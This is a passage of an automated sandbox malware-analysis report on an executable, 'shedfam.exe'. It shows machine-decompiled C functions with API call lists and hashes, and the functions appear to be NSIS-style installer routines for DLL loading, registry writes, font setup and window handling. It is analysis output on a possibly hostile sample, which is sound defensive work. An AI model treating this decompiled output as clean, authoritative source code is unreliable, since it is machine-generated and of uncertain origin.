                                                                  • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040323C,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004033DB), ref: 004057FD
                                                                  • lstrcatA.KERNEL32(?,00409010), ref: 0040580E
                                                                  Strings
                                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 004057EE
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.257281468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.257256064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257318535.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257326105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257337622.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257354953.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257362306.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257368418.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_shedfam.jbxd
                                                                  Similarity
                                                                  • API ID: CharPrevlstrcatlstrlen
                                                                  • String ID: C:\Users\user\AppData\Local\Temp\
                                                                  • API String ID: 2659869361-3916508600
                                                                  • Opcode ID: f17b2ccdaa8efd10834e0f4341d4d5b977b2bb6e8559feba5c8cad9ccc1df0ef
                                                                  • Instruction ID: a73f37ca2c4469ddb4ae9c1577b37cdaede3e1835012dc8acebf0dfdd4a4e987
                                                                  • Opcode Fuzzy Hash: f17b2ccdaa8efd10834e0f4341d4d5b977b2bb6e8559feba5c8cad9ccc1df0ef
                                                                  • Instruction Fuzzy Hash: 86D0A962615A703EE21236559C09F8B2A0CCF82700B14C833F600B22E2C63C5D41CFFE
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 59%
                                                                  			E00401F67(void* __ebx, void* __eflags) {
                                                                  				void* _t27;
                                                                  				struct HINSTANCE__* _t30;
                                                                  				CHAR* _t32;
                                                                  				intOrPtr* _t33;
                                                                  				void* _t34;
                                                                  
                                                                  				_t27 = __ebx;
                                                                  				asm("sbb eax, 0x424038");
                                                                  				 *(_t34 - 4) = 1;
                                                                  				if(__eflags < 0) {
                                                                  					_push(0xffffffe7);
                                                                  					L15:
                                                                  					E00401423();
                                                                  					L16:
                                                                  					 *0x424008 =  *0x424008 +  *(_t34 - 4);
                                                                  					return 0;
                                                                  				}
                                                                  				_t32 = E00402A0C(0xfffffff0);
                                                                  				 *(_t34 + 8) = E00402A0C(1);
                                                                  				if( *((intOrPtr*)(_t34 - 0x18)) == __ebx) {
                                                                  					L3:
                                                                  					_t30 = LoadLibraryExA(_t32, _t27, 8);
                                                                  					if(_t30 == _t27) {
                                                                  						_push(0xfffffff6);
                                                                  						goto L15;
                                                                  					}
                                                                  					L4:
                                                                  					_t33 = GetProcAddress(_t30,  *(_t34 + 8));
                                                                  					if(_t33 == _t27) {
                                                                  						E00404FE7(0xfffffff7,  *(_t34 + 8));
                                                                  					} else {
                                                                  						 *(_t34 - 4) = _t27;
                                                                  						if( *((intOrPtr*)(_t34 - 0x20)) == _t27) {
                                                                  							 *_t33( *((intOrPtr*)(_t34 - 8)), 0x400, 0x425000, 0x40b050, 0x409000);
                                                                  						} else {
                                                                  							E00401423( *((intOrPtr*)(_t34 - 0x20)));
                                                                  							if( *_t33() != 0) {
                                                                  								 *(_t34 - 4) = 1;
                                                                  							}
                                                                  						}
                                                                  					}
                                                                  					if( *((intOrPtr*)(_t34 - 0x1c)) == _t27 && E004036EE(_t30) != 0) {
                                                                  						FreeLibrary(_t30);
                                                                  					}
                                                                  					goto L16;
                                                                  				}
                                                                  				_t30 = GetModuleHandleA(_t32);
                                                                  				if(_t30 != __ebx) {
                                                                  					goto L4;
                                                                  				}
                                                                  				goto L3;
                                                                  			}








                                                                  0x00401f67
                                                                  0x00401f67
                                                                  0x00401f6c
                                                                  0x00401f73
                                                                  0x0040202f
                                                                  0x0040217a
                                                                  0x0040217a
                                                                  0x004028a1
                                                                  0x004028a4
                                                                  0x004028b0
                                                                  0x004028b0
                                                                  0x00401f82
                                                                  0x00401f8c
                                                                  0x00401f8f
                                                                  0x00401f9e
                                                                  0x00401fa8
                                                                  0x00401fac
                                                                  0x00402028
                                                                  0x00000000
                                                                  0x00402028
                                                                  0x00401fae
                                                                  0x00401fb8
                                                                  0x00401fbc
                                                                  0x00402000
                                                                  0x00401fbe
                                                                  0x00401fc1
                                                                  0x00401fc4
                                                                  0x00401ff4
                                                                  0x00401fc6
                                                                  0x00401fc9
                                                                  0x00401fd2
                                                                  0x00401fd4
                                                                  0x00401fd4
                                                                  0x00401fd2
                                                                  0x00401fc4
                                                                  0x00402008
                                                                  0x0040201d
                                                                  0x0040201d
                                                                  0x00000000
                                                                  0x00402008
                                                                  0x00401f98
                                                                  0x00401f9c
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000

                                                                  APIs
                                                                  • GetModuleHandleA.KERNEL32(00000000,00000001,000000F0), ref: 00401F92
                                                                    • Part of subcall function 00404FE7: lstrlenA.KERNEL32(0041FD58,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C60,00000000,?), ref: 00405020
                                                                    • Part of subcall function 00404FE7: lstrlenA.KERNEL32(00402C60,0041FD58,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C60,00000000), ref: 00405030
                                                                    • Part of subcall function 00404FE7: lstrcatA.KERNEL32(0041FD58,00402C60,00402C60,0041FD58,00000000,00000000,00000000), ref: 00405043
                                                                    • Part of subcall function 00404FE7: SetWindowTextA.USER32(0041FD58,0041FD58), ref: 00405055
                                                                    • Part of subcall function 00404FE7: SendMessageA.USER32 ref: 0040507B
                                                                    • Part of subcall function 00404FE7: SendMessageA.USER32 ref: 00405095
                                                                    • Part of subcall function 00404FE7: SendMessageA.USER32 ref: 004050A3
                                                                  • LoadLibraryExA.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00401FA2
                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 00401FB2
                                                                  • FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 0040201D
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.257281468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.257256064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257318535.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257326105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257337622.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257354953.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257362306.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257368418.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_shedfam.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                                  • String ID:
                                                                  • API String ID: 2987980305-0
                                                                  • Opcode ID: 7fb9b226615727d3441864a5fc6923e543d9c096b6fd48025687a41fa8be44d0
                                                                  • Instruction ID: 03d8e5a468c8d4f9f4276292500c9ce54345415f5676ade893a4261965153270
                                                                  • Opcode Fuzzy Hash: 7fb9b226615727d3441864a5fc6923e543d9c096b6fd48025687a41fa8be44d0
                                                                  • Instruction Fuzzy Hash: 8E210B32904115BBDF207F65CE8CA6E39B1BF44358F20423BF601B62D0DBBD49419A5E
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 90%
                                                                  			E00402319(void* __eax) {
                                                                  				void* _t15;
                                                                  				char* _t18;
                                                                  				int _t19;
                                                                  				char _t24;
                                                                  				int _t27;
                                                                  				intOrPtr _t35;
                                                                  				void* _t37;
                                                                  
                                                                  				_t15 = E00402B01(__eax);
                                                                  				_t35 =  *((intOrPtr*)(_t37 - 0x18));
                                                                  				 *(_t37 - 0x34) =  *(_t37 - 0x14);
                                                                  				 *(_t37 - 0x38) = E00402A0C(2);
                                                                  				_t18 = E00402A0C(0x11);
                                                                  				_t31 =  *0x424030 | 0x00000002;
                                                                  				 *(_t37 - 4) = 1;
                                                                  				_t19 = RegCreateKeyExA(_t15, _t18, _t27, _t27, _t27,  *0x424030 | 0x00000002, _t27, _t37 + 8, _t27);
                                                                  				if(_t19 == 0) {
                                                                  					if(_t35 == 1) {
                                                                  						E00402A0C(0x23);
                                                                  						_t19 = lstrlenA(0x40a450) + 1;
                                                                  					}
                                                                  					if(_t35 == 4) {
                                                                  						_t24 = E004029EF(3);
                                                                  						 *0x40a450 = _t24;
                                                                  						_t19 = _t35;
                                                                  					}
                                                                  					if(_t35 == 3) {
                                                                  						_t19 = E00402F2E(_t31,  *((intOrPtr*)(_t37 - 0x1c)), _t27, 0x40a450, 0xc00);
                                                                  					}
                                                                  					if(RegSetValueExA( *(_t37 + 8),  *(_t37 - 0x38), _t27,  *(_t37 - 0x34), 0x40a450, _t19) == 0) {
                                                                  						 *(_t37 - 4) = _t27;
                                                                  					}
                                                                  					_push( *(_t37 + 8));
                                                                  					RegCloseKey();
                                                                  				}
                                                                  				 *0x424008 =  *0x424008 +  *(_t37 - 4);
                                                                  				return 0;
                                                                  			}










                                                                  0x0040231a
                                                                  0x0040231f
                                                                  0x00402329
                                                                  0x00402333
                                                                  0x00402336
                                                                  0x00402346
                                                                  0x00402350
                                                                  0x00402357
                                                                  0x0040235f
                                                                  0x0040236d
                                                                  0x00402371
                                                                  0x0040237c
                                                                  0x0040237c
                                                                  0x00402380
                                                                  0x00402384
                                                                  0x0040238a
                                                                  0x0040238f
                                                                  0x0040238f
                                                                  0x00402393
                                                                  0x0040239f
                                                                  0x0040239f
                                                                  0x004023b8
                                                                  0x004023ba
                                                                  0x004023ba
                                                                  0x004023bd
                                                                  0x00402493
                                                                  0x00402493
                                                                  0x004028a4
                                                                  0x004028b0

                                                                  APIs
                                                                  • RegCreateKeyExA.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402357
                                                                  • lstrlenA.KERNEL32(0040A450,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 00402377
                                                                  • RegSetValueExA.ADVAPI32(?,?,?,?,0040A450,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023B0
                                                                  • RegCloseKey.ADVAPI32(?,?,?,0040A450,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402493
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.257281468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.257256064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257318535.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257326105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257337622.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257354953.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257362306.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257368418.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_shedfam.jbxd
                                                                  Similarity
                                                                  • API ID: CloseCreateValuelstrlen
                                                                  • String ID:
                                                                  • API String ID: 1356686001-0
                                                                  • Opcode ID: 095443195063697bdd456d4cd3d43ce86eee03aab12c67eea5854480753a1108
                                                                  • Instruction ID: ad8ea78d7240695516c5cd5a42f81e191ab97329ebd365d047bf213c76e9c1da
                                                                  • Opcode Fuzzy Hash: 095443195063697bdd456d4cd3d43ce86eee03aab12c67eea5854480753a1108
                                                                  • Instruction Fuzzy Hash: 14113071E00108BEEB10EFB5DE8DEAF7A79EB40358F10403AF905B61D1D6B85D419A69
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 67%
                                                                  			E00401D1B() {
                                                                  				void* __esi;
                                                                  				int _t6;
                                                                  				signed char _t11;
                                                                  				struct HFONT__* _t14;
                                                                  				void* _t18;
                                                                  				void* _t24;
                                                                  				void* _t26;
                                                                  				void* _t28;
                                                                  
                                                                  				_t6 = GetDeviceCaps(GetDC( *(_t28 - 8)), 0x5a);
                                                                  				0x40b054->lfHeight =  ~(MulDiv(E004029EF(2), _t6, 0x48));
                                                                  				 *0x40b064 = E004029EF(3);
                                                                  				_t11 =  *((intOrPtr*)(_t28 - 0x18));
                                                                  				 *0x40b06b = 1;
                                                                  				 *0x40b068 = _t11 & 0x00000001;
                                                                  				 *0x40b069 = _t11 & 0x00000002;
                                                                  				 *0x40b06a = _t11 & 0x00000004;
                                                                  				E00405D1D(_t18, _t24, _t26, 0x40b070,  *((intOrPtr*)(_t28 - 0x24)));
                                                                  				_t14 = CreateFontIndirectA(0x40b054);
                                                                  				_push(_t14);
                                                                  				_push(_t26);
                                                                  				E00405C59();
                                                                  				 *0x424008 =  *0x424008 +  *((intOrPtr*)(_t28 - 4));
                                                                  				return 0;
                                                                  			}











                                                                  0x00401d29
                                                                  0x00401d42
                                                                  0x00401d4c
                                                                  0x00401d51
                                                                  0x00401d5c
                                                                  0x00401d63
                                                                  0x00401d75
                                                                  0x00401d7b
                                                                  0x00401d80
                                                                  0x00401d8a
                                                                  0x004024ce
                                                                  0x00401561
                                                                  0x00402849
                                                                  0x004028a4
                                                                  0x004028b0

                                                                  APIs
                                                                  • GetDC.USER32(?), ref: 00401D22
                                                                  • GetDeviceCaps.GDI32(00000000), ref: 00401D29
                                                                  • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D38
                                                                  • CreateFontIndirectA.GDI32(0040B054), ref: 00401D8A
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.257281468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.257256064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257318535.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257326105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257337622.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257354953.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257362306.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257368418.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_shedfam.jbxd
                                                                  Similarity
                                                                  • API ID: CapsCreateDeviceFontIndirect
                                                                  • String ID:
                                                                  • API String ID: 3272661963-0
                                                                  • Opcode ID: 8e548603e350ce1a89f038fa1766b34cdc841b1a5af396ce190c880d9480c0eb
                                                                  • Instruction ID: c086b606221abe62c4a5ea5e4ce8852375084165fd0064a8092653b5abcc508f
                                                                  • Opcode Fuzzy Hash: 8e548603e350ce1a89f038fa1766b34cdc841b1a5af396ce190c880d9480c0eb
                                                                  • Instruction Fuzzy Hash: FAF04471A48240AEE70167709E0AB9B3F64D715305F104476B251B62F2C7790444CBAE
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 100%
                                                                  			E00403A17(void* __ecx, void* __eflags) {
                                                                  				void* __ebx;
                                                                  				void* __edi;
                                                                  				void* __esi;
                                                                  				signed short _t6;
                                                                  				intOrPtr _t11;
                                                                  				signed int _t13;
                                                                  				signed int _t16;
                                                                  				signed short* _t18;
                                                                  				signed int _t20;
                                                                  				signed short* _t23;
                                                                  				intOrPtr _t25;
                                                                  				signed int _t26;
                                                                  				intOrPtr* _t27;
                                                                  
                                                                  				_t24 = "1033";
                                                                  				_t13 = 0xffff;
                                                                  				_t6 = E00405C72(__ecx, "1033");
                                                                  				while(1) {
                                                                  					_t26 =  *0x423fc4;
                                                                  					if(_t26 == 0) {
                                                                  						goto L7;
                                                                  					}
                                                                  					_t16 =  *( *0x423f90 + 0x64);
                                                                  					_t20 =  ~_t16;
                                                                  					_t18 = _t16 * _t26 +  *0x423fc0;
                                                                  					while(1) {
                                                                  						_t18 = _t18 + _t20;
                                                                  						_t26 = _t26 - 1;
                                                                  						if((( *_t18 ^ _t6) & _t13) == 0) {
                                                                  							break;
                                                                  						}
                                                                  						if(_t26 != 0) {
                                                                  							continue;
                                                                  						}
                                                                  						goto L7;
                                                                  					}
                                                                  					 *0x423760 = _t18[1];
                                                                  					 *0x424028 = _t18[3];
                                                                  					_t23 =  &(_t18[5]);
                                                                  					if(_t23 != 0) {
                                                                  						 *0x42375c = _t23;
                                                                  						E00405C59(_t24,  *_t18 & 0x0000ffff);
                                                                  						SetWindowTextA( *0x420558, E00405D1D(_t13, _t24, _t26, 0x423780, 0xfffffffe));
                                                                  						_t11 =  *0x423fac;
                                                                  						_t27 =  *0x423fa8;
                                                                  						if(_t11 == 0) {
                                                                  							L15:
                                                                  							return _t11;
                                                                  						}
                                                                  						_t25 = _t11;
                                                                  						do {
                                                                  							_t11 =  *_t27;
                                                                  							if(_t11 != 0) {
                                                                  								_t11 = E00405D1D(_t13, _t25, _t27, _t27 + 0x18, _t11);
                                                                  							}
                                                                  							_t27 = _t27 + 0x418;
                                                                  							_t25 = _t25 - 1;
                                                                  						} while (_t25 != 0);
                                                                  						goto L15;
                                                                  					}
                                                                  					L7:
                                                                  					if(_t13 != 0xffff) {
                                                                  						_t13 = 0;
                                                                  					} else {
                                                                  						_t13 = 0x3ff;
                                                                  					}
                                                                  				}
                                                                  			}
















                                                                  0x00403a1b
                                                                  0x00403a20
                                                                  0x00403a26
                                                                  0x00403a2b
                                                                  0x00403a2b
                                                                  0x00403a33
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00403a3b
                                                                  0x00403a43
                                                                  0x00403a45
                                                                  0x00403a4b
                                                                  0x00403a4b
                                                                  0x00403a4d
                                                                  0x00403a59
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00403a5d
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00403a5f
                                                                  0x00403a64
                                                                  0x00403a6d
                                                                  0x00403a73
                                                                  0x00403a78
                                                                  0x00403a8c
                                                                  0x00403a97
                                                                  0x00403aaf
                                                                  0x00403ab5
                                                                  0x00403aba
                                                                  0x00403ac2
                                                                  0x00403ae3
                                                                  0x00403ae3
                                                                  0x00403ae3
                                                                  0x00403ac4
                                                                  0x00403ac6
                                                                  0x00403ac6
                                                                  0x00403aca
                                                                  0x00403ad1
                                                                  0x00403ad1
                                                                  0x00403ad6
                                                                  0x00403adc
                                                                  0x00403adc
                                                                  0x00000000
                                                                  0x00403ac6
                                                                  0x00403a7a
                                                                  0x00403a7f
                                                                  0x00403a88
                                                                  0x00403a81
                                                                  0x00403a81
                                                                  0x00403a81
                                                                  0x00403a7f

                                                                  APIs
                                                                  • SetWindowTextA.USER32(00000000,00423780), ref: 00403AAF
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.257281468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.257256064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257318535.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257326105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257337622.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257354953.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257362306.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257368418.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_shedfam.jbxd
                                                                  Similarity
                                                                  • API ID: TextWindow
                                                                  • String ID: "C:\Users\user\Desktop\shedfam.exe"$1033
                                                                  • API String ID: 530164218-620422693
                                                                  • Opcode ID: bde8280c9c770d58924a074a3110f1818d19584ed3810c5b524036327c9d2aac
                                                                  • Instruction ID: d2f26ffd722b9fc2ec01e0f6875488dfbe0f51797c7981412bd9696a178e6430
                                                                  • Opcode Fuzzy Hash: bde8280c9c770d58924a074a3110f1818d19584ed3810c5b524036327c9d2aac
                                                                  • Instruction Fuzzy Hash: D511D071B00201ABC720EF149C80A373BA8EB85716369813BE841A73A0D73D9A028E58
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 100%
                                                                  			E00404F37(struct HWND__* _a4, int _a8, int _a12, long _a16) {
                                                                  				long _t22;
                                                                  
                                                                  				if(_a8 != 0x102) {
                                                                  					if(_a8 != 0x200) {
                                                                  						_t22 = _a16;
                                                                  						L7:
                                                                  						if(_a8 == 0x419 &&  *0x420568 != _t22) {
                                                                  							 *0x420568 = _t22;
                                                                  							E00405CFB(0x420580, 0x425000);
                                                                  							E00405C59(0x425000, _t22);
                                                                  							E0040140B(6);
                                                                  							E00405CFB(0x425000, 0x420580);
                                                                  						}
                                                                  						L11:
                                                                  						return CallWindowProcA( *0x420570, _a4, _a8, _a12, _t22);
                                                                  					}
                                                                  					if(IsWindowVisible(_a4) == 0) {
                                                                  						L10:
                                                                  						_t22 = _a16;
                                                                  						goto L11;
                                                                  					}
                                                                  					_t22 = E004048B6(_a4, 1);
                                                                  					_a8 = 0x419;
                                                                  					goto L7;
                                                                  				}
                                                                  				if(_a12 != 0x20) {
                                                                  					goto L10;
                                                                  				}
                                                                  				E00404003(0x413);
                                                                  				return 0;
                                                                  			}




                                                                  0x00404f43
                                                                  0x00404f68
                                                                  0x00404f88
                                                                  0x00404f8b
                                                                  0x00404f8e
                                                                  0x00404fa5
                                                                  0x00404fab
                                                                  0x00404fb2
                                                                  0x00404fb9
                                                                  0x00404fc0
                                                                  0x00404fc5
                                                                  0x00404fcb
                                                                  0x00000000
                                                                  0x00404fdb
                                                                  0x00404f75
                                                                  0x00404fc8
                                                                  0x00404fc8
                                                                  0x00000000
                                                                  0x00404fc8
                                                                  0x00404f81
                                                                  0x00404f83
                                                                  0x00000000
                                                                  0x00404f83
                                                                  0x00404f49
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00404f50
                                                                  0x00000000

                                                                  APIs
                                                                  • IsWindowVisible.USER32(?), ref: 00404F6D
                                                                  • CallWindowProcA.USER32 ref: 00404FDB
                                                                    • Part of subcall function 00404003: SendMessageA.USER32 ref: 00404015
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.257281468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.257256064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257318535.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257326105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257337622.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257354953.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257362306.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257368418.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_shedfam.jbxd
                                                                  Similarity
                                                                  • API ID: Window$CallMessageProcSendVisible
                                                                  • String ID:
                                                                  • API String ID: 3748168415-3916222277
                                                                  • Opcode ID: a9a9cd53ea9b16651c68b641742eb392f20282b9ff56190fccbee61235c86997
                                                                  • Instruction ID: e5405207afdf9c80724cdb5948ae190fd13b5b366899adbc3f84073b9e1b6582
                                                                  • Opcode Fuzzy Hash: a9a9cd53ea9b16651c68b641742eb392f20282b9ff56190fccbee61235c86997
                                                                  • Instruction Fuzzy Hash: 2A116D71604209BBEF21AF52DD4199B3768AB503A5F00813BFA05791E1C7784992DFAD
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 100%
                                                                  			E004036B9() {
                                                                  				void* _t2;
                                                                  				void* _t3;
                                                                  				void* _t6;
                                                                  				void* _t8;
                                                                  
                                                                  				_t8 =  *0x41f53c;
                                                                  				_t3 = E0040369E(_t2, 0);
                                                                  				if(_t8 != 0) {
                                                                  					do {
                                                                  						_t6 = _t8;
                                                                  						_t8 =  *_t8;
                                                                  						FreeLibrary( *(_t6 + 8));
                                                                  						_t3 = GlobalFree(_t6);
                                                                  					} while (_t8 != 0);
                                                                  				}
                                                                  				 *0x41f53c =  *0x41f53c & 0x00000000;
                                                                  				return _t3;
                                                                  			}







                                                                  0x004036ba
                                                                  0x004036c2
                                                                  0x004036c9
                                                                  0x004036cc
                                                                  0x004036cc
                                                                  0x004036ce
                                                                  0x004036d3
                                                                  0x004036da
                                                                  0x004036e0
                                                                  0x004036e4
                                                                  0x004036e5
                                                                  0x004036ed

                                                                  APIs
                                                                  • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,74D0F560,00403690,00000000,00403482,00000000), ref: 004036D3
                                                                  • GlobalFree.KERNEL32 ref: 004036DA
                                                                  Strings
                                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 004036CB
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.257281468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.257256064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257318535.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257326105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257337622.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257354953.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257362306.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257368418.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_shedfam.jbxd
                                                                  Similarity
                                                                  • API ID: Free$GlobalLibrary
                                                                  • String ID: C:\Users\user\AppData\Local\Temp\
                                                                  • API String ID: 1100898210-3916508600
                                                                  • Opcode ID: e38f7b7ef76e64d847b72dc92418a1a22abc338dac8168bb5d5fc62d2911f828
                                                                  • Instruction ID: 7520a5cbb74b84659c3a5403b35965a418cfcd2fa6a259890695166e8a2f0d53
                                                                  • Opcode Fuzzy Hash: e38f7b7ef76e64d847b72dc92418a1a22abc338dac8168bb5d5fc62d2911f828
                                                                  • Instruction Fuzzy Hash: 53E08C3281142067C6315F0ABD0875A76AC6B45B26F018436E900B73A187756C438FDC
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 100%
                                                                  			E00405835(char* _a4) {
                                                                  				char* _t3;
                                                                  				char* _t5;
                                                                  
                                                                  				_t5 = _a4;
                                                                  				_t3 =  &(_t5[lstrlenA(_t5)]);
                                                                  				while( *_t3 != 0x5c) {
                                                                  					_t3 = CharPrevA(_t5, _t3);
                                                                  					if(_t3 > _t5) {
                                                                  						continue;
                                                                  					}
                                                                  					break;
                                                                  				}
                                                                  				 *_t3 =  *_t3 & 0x00000000;
                                                                  				return  &(_t3[1]);
                                                                  			}





                                                                  0x00405836
                                                                  0x00405840
                                                                  0x00405842
                                                                  0x00405849
                                                                  0x00405851
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00405851
                                                                  0x00405853
                                                                  0x00405858

                                                                  APIs
                                                                  • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402CF4,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\shedfam.exe,C:\Users\user\Desktop\shedfam.exe,80000000,00000003), ref: 0040583B
